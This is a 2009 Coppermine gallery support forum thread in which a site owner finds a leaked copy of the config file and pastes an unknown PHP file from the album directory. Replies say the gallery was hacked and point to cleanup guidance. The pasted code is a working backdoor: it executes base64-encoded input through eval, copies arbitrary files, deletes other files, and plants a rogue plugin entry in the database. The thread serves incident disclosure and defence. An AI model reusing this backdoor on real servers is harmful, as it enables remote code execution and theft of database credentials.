Text only | Text with Images

coppermine-gallery.com/forum

Support => cpg1.4.x Support => Older/other versions => cpg1.4 miscellaneous => Topic started by: FM86 on February 21, 2009, 06:03:22 PM

Title: config.inc.php to txt - Hacking attempt?
Post by: FM86 on February 21, 2009, 06:03:22 PM
Hi guys!

I just realised something shoking:
I found out in the copper/album directory a txt file which is the exact copy of my config.inc.php file. That means the passwords are easily readable by all the world. I've never seen this file before...
There are other 2 unknown files in this directory. One of them is a php files which contains the code listed at the end of this topic.
Do you have any idea about what this it?

Thank you in advance!

Code Select
<?
$hash="b269fc....5a1623ec7fad79df17";
if(isset($_GET["ch"])){
echo "oke";
echo "eff0";
}
if(isset($_GET["patch"])){
include("../include/config.inc.php");
mysql_connect($CONFIG["dbserver"], $CONFIG["dbuser"], $CONFIG["dbpass"]);
mysql_select_db($CONFIG["dbname"]);
//phpinfo();
$codebase_str='<?php
$hash="b269fcfd....23ec7fad79df17";
if(eregi("picEditor"$REQUEST_URI)||$_POST["save"]==1||isset($_POST["_REQUEST"])){
 if(($_POST["hash"]!=$hash)){
 die("");
 }
}
?>';

$codebase_str=str_replace("b269fcfd8...23ec7fad79df17", $hash, $codebase_str);
$fp_codebase=fopen("userpics/codebase.php", "w");
fwrite($fp_codebase, $codebase_str);
$path=__FILE__;
preg_match("/(.*)(\/.*?)/", $path, $ok);
$path=$ok[0];
$mysql_path="/../../../../../../../../../../../../..".$path."userpics";
//echo $mysql_path."\n";
$sql="INSERT INTO `".$CONFIG['TABLE_PREFIX']."plugins` ( `plugin_id` , `name` , `path` , `priority` )
VALUES (
'', 'Sumple Plugin', '$mysql_path', '0'
);";
//echo $sql;
mysql_query($sql);
echo mysql_error();

if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != ".." && $file!="index.php" && !eregi($hash, $file)) {
if(is_file($file)){
unlink($file);
}
}
}
$fp=fopen("index.php", "w");
fclose($fp);
closedir($handle);
}
}
if(isset($_GET["eval"])){
eval(base64_decode($_GET["eval"]));
}
if(isset($_GET["up"])){
$fp=implode(file($_GET["up_name"]));
$fp_out=fopen($_GET["down_name"], "w");
fwrite($fp_out, $fp);
}
?>
Title: Re: config.inc.php to txt - Hacking attempt?
Post by: François Keller on February 21, 2009, 06:05:48 PM
Your galery was hacked. Delete the unknown files (have a look to the userpics folder too) and update to the latest cpg version (cpg1.4.20)
Title: Re: config.inc.php to txt - Hacking attempt?
Post by: Joachim Müller on February 25, 2009, 08:59:04 AM
Quote from: François Keller on February 21, 2009, 06:05:48 PM
Delete the unknown files (have a look to the userpics folder too)
That's not enough. Read the official sanitization thread "Yikes, I've been hacked! Now what? (http://forum.coppermine-gallery.net/index.php/topic,51927.0.html)"
Text only | Text with Images